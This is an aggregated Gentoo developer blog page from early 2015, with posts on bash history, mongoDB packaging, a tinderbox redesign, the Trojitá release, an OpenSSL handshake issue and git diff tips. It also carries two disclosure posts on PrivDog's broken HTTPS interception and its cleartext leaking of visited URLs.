
Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
March 06, 2015, 05:04 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

March 05, 2015
Paweł Hajdan, Jr. a.k.a. phajdan.jr (homepage, bugs)

I've been occasionally hitting frustrating issues with bash history getting lost after a crash. Then I found this great blog post about keeping bash history in sync on disk and between multiple terminals.

tl;dr is to use "shopt -s histappend" and PROMPT_COMMAND="${PROMPT_COMMAND};history -a"

The first is usually the default, and results in sane behavior when you have multiple bash sessions open at the same time. The second one ("history -a") is really useful for flushing the history to disk in case of crashes.
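Put together, this is the minimal ~/.bashrc sketch (the ${PROMPT_COMMAND:+...} guard, which avoids a stray leading semicolon when PROMPT_COMMAND starts out empty, is my own tweak):

# append to the history file on exit instead of overwriting it
shopt -s histappend
# flush this session's new history lines to disk after every prompt
PROMPT_COMMAND="${PROMPT_COMMAND:+$PROMPT_COMMAND;}history -a"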

I'm happy to announce that both are now default in Gentoo! Please see bug #517342 for reference.

February 27, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Sometimes "best" does not mean "better" (February 27, 2015, 19:37 UTC)

Please bear with me, this post will start as ramblings of a photography nerd who's not really very good at photography, but will move on to talk of more general technical discussions.

I recently had a discussion on Google+ about a camera lens I bought — the Tamron 16-300. I like the lens, or I wouldn't have bought it, but the discussion was about the fact that the specs of the lens are at best mediocre, and possibly worse than other cheaper lenses.

It is true, a lens that ranges between f/3.5 and f/6.3 is not exactly a super-duper lens; it means it can't take pictures in low-light conditions unless you give up on quality (bring the ISO up) or use a flash. Just before, someone also suggested the Canon 24-105 f/4L, which according to many is the best lens of its kind. But that's not a better lens for me.

The reason why I say this is that I have considered the best lenses ever made, and turned many down for various issues — the most common of which is, of course, price; I'm not good enough a photographer to justify spending over ten grand on gear every year. The Tamron I bought is, in my opinion, the better one for the space I was trying to fill, so let's first look at what that space was.

First of all, I don't have professional gear; I'm still shooting with a three-year-old Canon EOS 600D (Rebel T3i for the Americans), a so-called prosumer camera with a cropped sensor. I have over time bought a few pieces of glass, but the one I have used the most has definitely been the Canon 50mm f/1.4, which sounded expensive at the time and now sounds almost cheap in comparison — since this is a cropped sensor, the lens behaves like an 80mm, which is a good portrait length for mugshots and has its uses for parties and conferences.

This lens turns out to be mostly useless in museums though, and in general in enclosed spaces. And for big panoramas. For that I wanted a wide-angle lens and I bought a Tokina 11-16mm f/2.8 which is fast enough to shoot within buildings, even though it has a bit of chromatic aberration when shooting at maximum aperture.

Yes I know it's getting boring, bear with me a little longer.

So what is missing here is a lens for general pictures at a party that is not as close-up as the 50mm (you can get something akin to the actual 50mm with a 28mm), and something to take pictures at a distance. For those I have been using the kit lenses, the cheap 18-55mm and the 55-250mm — neither version is, as far as I can tell, still on the market; they have been replaced by comparatively decent versions, especially the 18-55mm STM.

Okay, nobody but the photographers – who already know this – cares about these details, so in short, what gives? Well, I wanted to replace the two kit lenses with one versatile lens. The idea is that if I'm, say, at Muir Woods, I'd rather not keep switching between the 50mm and the 11-16mm lenses, especially under the trees, with the risk of dirt hitting the mirror or the sensor. I did that one time, but found it very inconvenient, which is why I was looking for a zoom lens that would not bankrupt me.

The Tamron is a decent lens. I've paid some €700 for it and a couple of (good) filters (UV and CP), which is not cheap but does not ruin me (remember I paid $600/month for the tinderbox, and that stopped now). Its specs are not stellar, and especially at 300mm f/6.3 it is indeed a little too slow, and there is some CA when shooting at 16mm too, but nothing bad enough. It pays off in terms of opportunity: in many cases I'm not setting out to take pictures of something in particular; rather, I'm going somewhere and bringing the camera with me, and when I want to take a picture I may not know of what at first… if I have the wrong lens on, I may not be able to take a picture quickly enough; if I did not bring the right lens, I would not be able to take a picture at all. With a versatile zoom lens as my default-on, I can just take the camera out and shoot, even if it's not perfect — if I want to make it perfect I can put on the good lens.

Again, I could have saved a few more months and bought a more expensive lens, the "best" lens — but there are other things to consider: since I did have this lens, I was able to take some pictures of an RC car race near Mission College without having to find room to switch lenses between whole-track pictures and details of the cars. I also would not be comfortable carrying a lens that costs over $1k on its own around with me when I'm not sure where I'm going; sure, the rest of the lenses together already add up to that number, but they are also less conspicuous — the only one that is actually bigger than someone's hand is the Tokina.

This has also another side effect: it seems like many places in California have a "no professional photography without permission" rule, including Stanford University. The way "professional photography" gets defined is by the size of one's lens (the joke about sizes counting is old, get over it), namely if the lens does not fit in your hands it is counted as "professional". By that rule, the Tamron lens is not a professional one, while the suggested Canon 24-105 would be.

Finally cutting to the chase, the point of the episode I recounted is that decisions are made for many reasons besides technical specs. The same discussions I heard about the bad specs of the lenses I was looking at reminded me of discussions I had before, when people insisted that there was no reason for tablets because we have laptops (for the 10") and smartphones (for the 7"), or about using a convenient airline rather than one that has better planes, or… you get the gist, right?

The same is true when people try to discuss Free Software or Open Source purely in terms of technical superiority. It may well be true, but that does not always make it a good choice by itself; there are other considerations: hardware support used to be the main concern, nowadays UI and UX seem to be the biggest, but it is not limited to those.

This is similar in spirit to the story of Jessica that SwiftOnSecurity posted, but in this case I'm not even talking about people who don't know (and don't care to know), but rather about the fact that people have different priorities, and technical superiority is not always one of them.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
mongoDB 2.6.8, 2.4.13 & the upcoming 3.0.0 (February 27, 2015, 10:35 UTC)

I've been slacking a bit on those follow-up posts, but with the upcoming mongoDB 3.x series and the recent new releases I guess it was about time I talked a bit about what's going on.

 mongodb-3.0.0_rcX

Thanks to the help of Tomas Mozes, we might get a release candidate of mongoDB 3.0.0 in the tree pretty soon, should you want to test it on Gentoo. Feel free to contribute or give feedback in the bug; I'll do my best to keep up.

What Tomas proposes matches what I had in mind, so for now the plan is to:

  • split the mongo tools (mongodump/export etc.) into a new package: dev-db/mongo-tools or app-admin/mongo-tools?
  • split the MMS monitoring agent into its own package: app-admin/mms-monitoring-agent
  • have a look at the MMS backup agent and maybe propose its own package if someone is interested in this?
  • after the first release, have a look at the MMS deployment automation to see how it could integrate with Gentoo

mongodb-2.6.8 & 2.4.13

Released two days ago, they are already in portage! The 2.4.13 is mostly a security (SSLv3) and tiny backport release, whereas 2.6.8 fixes quite a bunch of bugs.

Please note that I will drop the 2.4.x releases when 3.0.0 hits the tree! I will keep the latest 2.4.13 in my overlay if someone asks for it.

Service relaunch: archives.gentoo.org (February 27, 2015, 01:03 UTC)

The Gentoo Infrastructure team is proud to announce that we have re-engineered the mailing list archives and re-launched them, back at archives.gentoo.org. The prior MHonArc-based system had numerous problems, and a complete revamp was deemed the best way to move forward. The new system is powered by ElasticSearch (more features to come).

All existing URLs should either work directly, or redirect you to the new location for that content.

Major thanks to Alex Legler, for his development of this project.

Note that we're still doing some catchup on newer messages, but delays will drop to under 2 hours soon, with an eventual goal of under 30 minutes.

Please report problems to Bugzilla: Product Websites, Component Archives

February 25, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr: PrivDog will send the URLs of webpages you surf to a server owned by AdTrustMedia. This happened unencrypted, in cleartext HTTP. It is true both for the version that is shipped with some Comodo products and for the standalone version from the PrivDog webpage.

On Sunday I wrote here that the software PrivDog had a severe security issue that compromised the security of HTTPS connections. In the meantime PrivDog has published an advisory and an update for their software. I had a look at the updated version. While I haven't found any further obvious issues in the TLS certificate validation, I found other things that I find worrying.

Let me quickly recap what PrivDog is all about. The webpage claims: "PrivDog protects your privacy while browsing the web and more!" What PrivDog does technically is to detect ads it considers as bad and replace them with ads delivered by AdTrustMedia, the company behind PrivDog.

I had a look at the network traffic from a system using PrivDog. It sent some JSON-encoded data to the URL http://ads.adtrustmedia.com/safecheck.php. The data sent looks like this:

{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=logout", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914287827}
{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914313848}
{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=editSelect", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914316235}


And from another try with the browser plugin variant shipped with Comodo Internet Security:

{"method":"register_url","url":"https:\\/\\/www.facebook.com\\/?_rdr","user_guid":"686F27D9580CF2CDA8F6D4843DC79BA1","referrer":""}
{"method":"register_url","url":"https:\\/\\/www.facebook.com\\/login.php?login_attempt=1","user_guid":"686F27D9580CF2CDA8F6D4843DC79BA1","referrer":"https:\\/\\/www.facebook.com\\/?_rdr"}


On a Linux router or host system this could be tested with a command like tcpdump -A dst ads.adtrustmedia.com | grep register_url. (I was unable to do the same on the affected system with the Windows version of tcpdump; I'm not sure why.)

Now here is the troubling part: The URLs I surf to are all sent to a server owned by AdTrustMedia. As you can see in this example these are HTTPS-protected URLs, some of them from the internal backend of my blog. In my tests all URLs the user surfed to were sent, sometimes with some delay, but not URLs of objects like iframes or images.

This is worrying for various reasons. First of all with this data AdTrustMedia could create a profile of users including all the webpages the user surfs to. Given that the company advertises this product as a privacy tool this is especially troubling, because quite obviously this harms your privacy.

This communication happened in clear text, even for URLs that are HTTPS. HTTPS does not protect metadata and a passive observer of the network traffic can always see which domains a user surfs to. But what HTTPS does encrypt is the exact URL a user is calling. Sometimes the URL can contain security sensitive data like session ids or security tokens. With PrivDog installed the HTTPS URL was no longer protected, because it was sent in cleartext through the net.

The TLS certificate validation issue was only present in the standalone version of PrivDog and not the version that is bundled with Comodo Internet Security as part of the Chromodo browser. However this new issue of sending URLs to an AdTrustMedia server was present in both the standalone and the bundled version.

I have asked PrivDog for a statement: "In accordance with our privacy policy all data sent is anonymous and we do not store any personally identifiable information. The API is utilized to help us prevent fraud of various types including click fraud which is a serious problem on the Internet. This allows us to identify automated bots and other threats. The data is also used to improve user experience and enables the system to deliver users an improved and more appropriate ad experience." They also said that they will update the configuration of clients to use HTTPS instead of HTTP to transmit the data.

PrivDog made further HTTP calls. Sometimes it fetched JavaScript and iframes from the server trustedads.adtrustmedia.com. By manipulating these I was able to inject JavaScript into webpages. However, I have only seen this happen with HTTP webpages. This by itself doesn't open up security issues, because an attacker able to control network traffic can already manipulate the content of HTTP webpages and can therefore inject JavaScript anyway. There are also other unencrypted HTTP requests to AdTrustMedia servers transmitting JSON data whose exact meaning I don't know.

February 24, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
TG4: Tinderbox Generation 4 (February 24, 2015, 21:08 UTC)

Everybody's a critic: the first comment I received when I showed other Gentoo developers my previous post about the tinderbox was a question on whether I would be using pkgcore for the new generation tinderbox. If you have understood what my blog post was about, you probably understand why I was not happy about such a question.

I thought the blog post made it very clear that my focus right now is not to change the way the tinderbox runs, but the way the reporting pipeline works. This is the same problem as in 2009: generating build logs is easy, sifting through them is not. At first I thought this was hard just for me, but the fact that GSoC attracted multiple people interested in doing continuous builds, but not one interested in logmining, showed me this is just a hard problem.

The approach I took last time, with what I'll start calling TG3 (Tinderbox Generation 3), was to highlight the error/warning messages, provide a list of build logs for which a problem was identified (without caring much about which kind of problem), and just show broken builds or broken tests in the interface. This was easy to build, and up to a point easy to use, but it had a lot of drawbacks.

The major drawbacks of that UI are that it relies on manual work to identify open bugs for the package (and thus to make sure not to report duplicate bugs), and on my own memory not to report the same issue multiple times if the bug was closed as NEEDINFO.

I don't have my graphic tablet with me to draw a mock of what I have in mind yet, but I can throw in some of the things I've been thinking of:

  • Being able to tell what problem or problems a particular build is about. It's easy to tell whether a build log is just a build failure or a test failure, but what if instead it has three or four different warning conditions? Being able to tell which ones have been found and having a single-click bug filing system would be a good start.
  • Keep in mind the bugs filed against a package. This is important because sometimes a build log is just a repeat of something filed already; it may be that it failed multiple times since you started a reporting run, so it might be better to show that easily.
  • Related, it should collapse failures for packages so as not to repeat the same package multiple times on the page. Say you look at the build failures every day or two; you don't care if the same package failed 20 times, especially if the logs report the same error. Finding out whether the error messages are the same is tricky, but at least you can collapse the multiple logs into a single log per package, so you don't need to skip it over and over again.
  • Again related, it should keep track of which logs have been read and which weren't. It's going to be tricky if the app is made multi-user, but at least a starting point needs to be there.
  • It should show the three most recent bugs open for the package (and a count of how many other open bugs) so that if the bug was filed by someone else, it does not need to be filed again. Bonus points for showing the few most recently reported closed bugs too.

You can tell already that this is a considerably more complex interface than the one I used before. I expect it'll take some work with JavaScript at the very least, so I may end up doing it with AngularJS and Go mostly because that's what I need to learn at work as well, don't get me started. At least I don't expect I'll be doing it in Polymer but I won't exclude that just yet.

Why do I spend this much time thinking and talking (and soon writing) about UI? Because I think this is the current bottleneck to scaling up the amount of analysis of Gentoo's quality. Running a tinderbox is getting cheaper — there are plenty of dedicated server offers that are considerably cheaper than what I paid for hosting Excelsior, let alone the initial investment in it. And this is without looking again at the possible costs of running them on GCE or AWS on demand.

Three years ago, my choice of a physical server in my hands was easier to justify than now, with 4-core HT servers with 48GB of RAM starting at €40/month — while I/O is still the limiting factor, with that much RAM it's well possible to have one tinderbox building fully in tmpfs, and just run a separate server for a second instance, rather than sharing multiple instances.

And even if GCE/AWS instances that are charged for time running are not exactly interesting for continuous build systems, having a cloud image that can be instructed to start running a tinderbox with a fixed set of packages, say all the reverse dependencies of libav, would make it possible to run explicit tests for code that is known to be fragile, while not pausing the main tinderbox.

Finally, there are different ideas of how we should be testing packages: all options enabled, all options disabled, multilib or not, hardened or not, one package at a time, all packages together… they can all share the same exact logmining pipeline, as all it needs is the emerge --info output, and the log itself, which can have markers for known issues to look out for or not. And then you can build the packages however you desire, as long as you can submit them there.

Now my idea is not to just build this for myself and run analysis for everybody who wants to submit build logs, because that would be just about as crazy. But I think it would be okay to have a shared instance for Gentoo developers to submit build logs from their own personal instances, if they want to, and then have them look at their own accounts only. It's not going to be my first target, but I'll keep it in mind when I start my mocks and implementations, because I think it might prove successful.

February 23, 2015
Jan Kundrát a.k.a. jkt (homepage, bugs)
Trojita 0.5 is released (February 23, 2015, 10:03 UTC)

Hi all,
we are pleased to announce version 0.5 of Trojitá, a fast Qt IMAP e-mail client. More than 500 changes went in since the previous release, so the following list highlights just a few of them:

  • Trojitá can now be invoked with a mailto: URL (RFC 6068) on the command line for composing a new email (see the example after this list).
  • Messages can be forwarded as attachments (support for inline forwarding is planned).
  • Passwords can be remembered in a secure, encrypted storage via QtKeychain.
  • E-mails with attachments are decorated with a paperclip icon in the overview.
  • Better rendering of e-mails with extraordinary MIME structure.
  • By default, only one instance is kept running, and can be controlled via D-Bus.
  • Trojitá now provides better error reporting, and can reconnect on network failures automatically.
  • The network state (Offline, Expensive Connection or Free Access) will be remembered across sessions.
  • When replying, it is now possible to retroactively change the reply type (Private Reply, Reply to All but Me, Reply to All, Reply to Mailing List, Handpicked).
  • When searching in a message, Trojitá will scroll to the current match.
  • Attachment preview for quick access to the enclosed files.
  • The mark-message-read-after-X-seconds setting is now configurable.
  • The IMAP refresh interval is now configurable.
  • Speed and memory consumption improvements.
  • Miscellaneous IMAP improvements.
  • Various fixes and improvements.
  • We have increased our test coverage, and are now making use of an improved Continuous Integration setup with pre-commit patch testing.
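For instance, composing a new mail from a shell could look like this (a sketch; I'm assuming the executable is called trojita, and the URL follows RFC 6068):

$ trojita "mailto:jkt@example.net?subject=Hello%20world"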

This release has been tagged in git as "v0.5". You can also download a tarball (GPG signature). Prebuilt binaries for multiple distributions are available via the OBS, and so is a Windows installer.

We would like to thank Karan Luthra and Stephan Platz for their efforts during Google Summer of Code 2014.

The Trojitá developers

  • Jan Kundrát
  • Pali Rohár
  • Dan Chapman
  • Thomas Lübking
  • Stephan Platz
  • Boren Zhang
  • Karan Luthra
  • Caspar Schutijser
  • Lasse Liehu
  • Michael Hall
  • Toby Chen
  • Niklas Wenzel
  • Marko Käning
  • Bruno Meneguele
  • Yuri Chornoivan
  • Tomáš Chvátal
  • Thor Nuno Helge Gomes Hultberg
  • Safa Alfulaij
  • Pavel Sedlák
  • Matthias Klumpp
  • Luke Dashjr
  • Jai Luthra
  • Illya Kovalevskyy
  • Edward Hades
  • Dimitrios Glentadakis
  • Andreas Sturmlechner
  • Alexander Zabolotskikh

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The tinderbox is dead, long live the tinderbox (February 23, 2015, 03:24 UTC)

I announced it last November and now it became reality: the Tinderbox is no more, in hardware as well as software. Excelsior was taken out of the Hurricane Electric facility in Fremont this past Monday, just before I left for SCALE13x.

Originally the box was hosted by my then-employer, but as of last year, to allow more people to have access to its workings, I had it moved to my own rented cabinet, at a figure of $600/month. Not chump change, but it was okay for a while; unfortunately the cost-sharing option that was supposed to happen did not happen, and about a year later those $7200 do not feel like a good choice, and this is without delving into the whole insulting behavior of a fellow developer.

Right now the server is lying on the floor of an office in the Mountain View campus of my (current) employer. The future of the hardware is uncertain right now, but it's more likely than not going to be donated to Gentoo Foundation (minus the HDDs for obvious opsec). I'm likely going to rent a dedicated server of my own for development and testing, as even though they would be less powerful than Excelsior, they would be massively cheaper at €40/month.

The question becomes what we want to do with the idea of a tinderbox — it seemed like after I announced the demise people would get together to fix it once and for all, but four months later there is nothing to show for it. After speaking with other developers at SCaLE, and realizing that at this point I'm probably the only one with enough domain knowledge of the problems I tackled, I decided it's time for me to stop running a tinderbox and instead design one.

I'm going to write a few more blog posts to get into the nitty-gritty details of what I plan on doing, but I would like to provide at least a high-level idea of what I'm going to change drastically in the next iteration.

The first difference will be the target execution environment. When I wrote the tinderbox analysis scripts I designed them to run in a mostly sealed system. Because the tinderbox was running in someone else's cabinet, within its management network, I decided I would not provide any direct access to either the tinderbox container or the app that would mangle that data. This is why the storage for both the metadata and the logs was Amazon: pushing the data out was easy and did not require me to give access to the system to anyone else.

In the new design this will not be important — not only because it'll be designed to push the data directly into Bugzilla, but more importantly because I'm not going to run a tinderbox in such an environment. Well, admittedly I'm just not going to run a tinderbox ever again, and will just build the code to do so, but the whole point is that I won't keep that restriction on to begin with.

And since the data store now is only temporary, I don't think it's worth over-optimizing for performance. While I originally considered and dropped the option of storing the logs in PostgreSQL for performance reasons, now this is unlikely to be a problem. Even if the queries would take seconds, it's not like this is going to be a deal breaker for an app with a single user. Even more importantly, the time taken to create the bug on the Bugzilla side is likely going to overshadow any database inefficiency.

The part that I've still got some doubts about is how to push the data from the tinderbox instance to the collector (which may or may not be the webapp that opens the bugs too.) Right now the tinderbox does some analysis through bashrc, leaving warnings in the log — the log is then sent to the collector through -chewing gum and saliva- tar and netcat (yes, really) to maintain one single piece of metadata: the filename.
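To make that concrete, the transport amounts to something like this sketch (host, port and log name are made up here, and the flags of the listening side vary between netcat flavors):

$ tar -cf - foo-1.0-r1:20150223.log | nc collector.example.net 9999    # tinderbox side
$ nc -l -p 9999 | tar -xf -                                            # collector side

The only metadata that survives the trip is the file name stored in the tarball.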

I would like to be able to collect some metadata on the tinderbox side (namely, emerge --info, which before was cached manually) and send it down to the collector. But adding this much logic is tricky, as the tinderbox should still operate with most of the operating system busted. My original napkin plan involved having the agent written in Go, using Apache Thrift to communicate to the main app, probably written in Django or similar.

The reason why I'm saying that Go would be a good fit is because of one piece of its design I do not like (in the general use case) at all: the static compilation. A Go binary will not break during a system upgrade of any runtime, because it has no runtime; which is in my opinion a bad idea for a piece of desktop or server software, but it's a godsend in this particular environment.

The reason I was considering Thrift in the first place was that I didn't want to look into XML-RPC or JSON-RPC. But then again, Bugzilla supports only those two, and my main concern (the size of the log files) would still be a problem when attaching them to Bugzilla just as much. Since Thrift would require me to package it for Gentoo (it seems nobody has yet), while JSON-RPC is already supported in Go, I think it might be a better idea to stick with JSON. Unfortunately Go does not support UTF-7, which would have made escaping binary data much easier.

Now what remains a problem is filing the bug and attaching the log to Bugzilla. If I were to write that part of the app in Python, it would be just a matter of using the pybugz libraries to handle it. But with JSON-RPC it should be fairly easy to implement support for it from scratch (unlike XML-RPC), so maybe it's worth just doing the whole thing in Go and reducing the proliferation of languages in use for such a project.

Python will remain in use for the tinderbox runner. Actually if anything I would like to remove the bash wrapper I've written and do the generation and selection of which packages to build in Python. It would also be nice if it could handle the USE mangling by itself, but that's difficult due to the sad conflicting requirements of the tree.

But this is enough details for the moment; I'll go back to thinking the implementation through and add more details about that as I get to them.

Hanno Böck a.k.a. hanno (homepage, bugs)
Software Privdog worse than Superfish (February 23, 2015, 00:27 UTC)

tl;dr: There is a piece of software called Privdog. It totally breaks HTTPS security, in a similar way to Superfish.

In case you haven't heard it, these past days an adware called Superfish made headlines. It was preinstalled on Lenovo laptops and it is bad: it totally breaks the security of HTTPS connections. The story became bigger when it became clear that a lot of other software packages were using the same technology, Komodia, with the same security risk.

What Superfish and other tools do is intercept encrypted HTTPS traffic to insert advertising on webpages. They do so by breaking the HTTPS encryption with a man-in-the-middle attack, which is possible because they install their own certificate into the operating system.

A number of people gathered in a chatroom, and we noted a thread on Hacker News where someone asked whether a tool called PrivDog is like Superfish. PrivDog's functionality is to replace advertising in web pages with its own advertising "from trusted sources". That by itself already sounds weird, even without any security issues.

A quick analysis shows that it doesn't have the same flaw as Superfish, but it has another one which arguably is even bigger. While Superfish used the same certificate and key on all hosts, PrivDog recreates a key/cert on every installation. However, here comes the big flaw: PrivDog will intercept every certificate and replace it with one signed by its root key. And that also means certificates that weren't valid in the first place. It will turn your browser into one that just accepts every HTTPS certificate out there, whether it's been signed by a certificate authority or not. We're still trying to figure out the details, but it looks pretty bad. (With some trickery you can do something similar on Superfish/Komodia, too.)

There are some things that are completely weird. When one surfs to a webpage that has a self-signed certificate (really self-signed, not signed by an unknown CA), it adds another self-signed cert with 512-bit RSA into the root certificate store of Windows. All other certs get replaced by 1024-bit RSA certs signed by a locally created PrivDog CA.

US-CERT writes: "Adtrustmedia PrivDog is promoted by the Comodo Group, which is an organization that offers SSL certificates and authentication solutions." A variant of PrivDog that is not affected by this issue is shipped with products produced by Comodo (see below). This makes this case especially interesting, because Comodo itself is a certificate authority (they had issues before). As ACLU technologist Christopher Soghoian points out on Twitter, the founder of PrivDog is the CEO of Comodo. (See this blog post.)

We will try to collect information on this and other similar software in a wiki on GitHub. (Discussions also happen on irc.ringoflightning.net #kekmodia.)

Thanks to Filippo, slipstream / raylee and others for all the analysis that has happened on this issue.

Update/Clarification: The dangerous TLS interception behaviour is part of the latest version of PrivDog 3.0.96.0, which can be downloaded from the PrivDog webpage. Comodo Internet Security bundles an earlier version of PrivDog that works with a browser extension, so it is not directly vulnerable to this threat. According to online sources PrivDog 3.0.96.0 was released in December 2014 and changed the TLS interception technology.

Update 2: Privdog published an Advisory.

February 21, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hi!

On a rather young Gentoo setup of mine I ran into SSLV3_ALERT_HANDSHAKE_FAILURE from rss2email.
Plain Python showed it, too:

# python -c "import urllib2; \
    urllib2.urlopen('https://twitrss.me/twitter_user_to_rss/?user=...')" \
    |& tail -n 1
urllib2.URLError: <urlopen error [SSL: SSLV3_ALERT_HANDSHAKE_FAILURE] \
    sslv3 alert handshake failure (_ssl.c:581)>

On other machines this yields

urllib2.HTTPError: HTTP Error 403: Forbidden

instead.

It turned out I had overlooked USE="bindist ..." in /etc/portage/make.conf, which is sitting there by default.
On OpenSSL, bindist disables elliptic curve support. So that is where the SSLV3_ALERT_HANDSHAKE_FAILURE came from.
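The fix is then to remove the flag and rebuild (a sketch; depending on what else was built against the crippled OpenSSL, more packages may need the same treatment). After taking "bindist" out of USE in /etc/portage/make.conf:

# emerge --oneshot --newuse dev-libs/openssl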

February 20, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Code memes, an unsolved problem (February 20, 2015, 20:35 UTC)

I'll start the post by pointing out that my use of the word meme will follow relatively closely the original definition provided by Dawkins (hate him, love him, or find him a prat that has sometimes good ideas) in The Selfish Gene rather than the more modern usage of "standard image template with similar text on it."

The reason is that I really need that definition to describe what I see happening often in code: the copy-pasting of snippets, or concepts, across projects, and projects, and projects, mutating slightly in some cases because of coding style rules and preferences.

This is particularly true when you're dealing with frameworks, such as Rails and Autotools; the obvious reason for that is that most people will strive for consistency with someone else — if they try themselves, they might make a mistake, but someone else already did the work for them, so why not use the same code? Or a very slightly different one just to suit their tastes.

Generally speaking, consistency is a good thing. For instance if I can be guaranteed that a given piece of code will always follow the same structure throughout a codebase I can make it easier on me to mutate the code base if, as an example, a function call loses one of its parameters. But when you're maintaining a (semi-)public framework, you no longer have control over the whole codebase, and that's where the trouble starts.

As you no longer have control over your users, bad code memes are going to ruin your day for years: the moment one influential user finds a way to work around a bug or implement a nice trick, their meme will live on for years, and breaking it is going to be just painful. This is why Autotools-based build systems suck in many cases: they all copied old bad memes from another build system, and those stuck around. Okay, there is a separate issue of people deciding to break all memes and creating something that barely works and will break at the first change in autoconf or automake, but that's beside my current point.

So when people started adding AC_CANONICAL_TARGET the result was an uphill battle to get people to drop it. It's not like it's a big problem for it to be there, it just makes the build system bloated, and it's one of a thousand cuts that make Autotools so despised. I'm using this as an example, but there are plenty of other memes in autotools that are worse, breaking compatibility, or cross-compilation, or the maintainers only know what.

This is not an easy corner to get out of. Adding warnings about the use of deprecated features can help, but sometimes it's not that simple, because it's not a feature being used, it's the structure that is the problem, and you can't easily (or at all) warn on that. So what do you do?

If your framework is internal to an organisation, a company or a project, your best option is to make sure that there are no pieces of code hanging around that uses the wrong paradigm. It's easy to say "here is the best practices piece of code, follow that, not the bad examples" — but people don't work that way, they will be looking on a search engine (or grep) for what they need done, and find the myriad bad examples to follow instead.

When your framework is open to the public and is used by people all around the world, well, there isn't much you can do about it, besides being proactive, pointing out the bad examples and providing solutions to them that people can reference. This was the reason why I started Autotools Mythbuster, especially as a series of blog posts.

You could start breaking the bad code, but it would probably be a bad move for PR, given that people will complain loudly that your software is broken (see the multiple API breakages in libav/ffmpeg). Even if you were able to provide patches to all the broken software out there, it's extremely unlikely that it'll be seen as a good move, and it might make things worse if there is no clear backward compatibility with the new code, as then you'll end up with the bad code and the good code wrapped around compatibility checks.

I don't have a clean solution, unfortunately. My approach is fix and document, but it's not always possible and it takes much more time than most people have to spare. It's sad, but it's the nature of software source code.

February 18, 2015
Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
Reviewing moved files with git (February 18, 2015, 08:29 UTC)

This might be a well-known trick already, but just in case it’s not…

Reviewing a patch can be a bit painful when a file has been changed and moved or renamed in one go (and there can be perfectly valid reasons for doing this). A nice thing about git is that you can reference files in an arbitrary tree while using git diff, so reviewing such changes can become easier if you do something like this:

$ git am 0001-the-thing-I-need-to-review.patch
$ git diff HEAD^:old/path/to/file.c new/path/to/file.c

This just references file.c in its old path, which is available in the commit before HEAD, and compares it to the file at the new path in the patch you just merged.

Of course, you can also use this to diff a file at some arbitrary point in the past, or in some arbitrary branch, with the same file at the current HEAD or any other point.
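For instance, comparing the same file between a tag and a branch could look like this (made-up refs and path):

$ git diff v1.0:src/foo.c master:src/foo.c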

Hopefully this is helpful to someone out there!

Update: As Alex Elsayed points out in the comments, git diff -M/-C can be used to similar effect. The above example could be written as:

$ git am 0001-the-thing-I-need-to-review.patch
$ git show -C

February 17, 2015
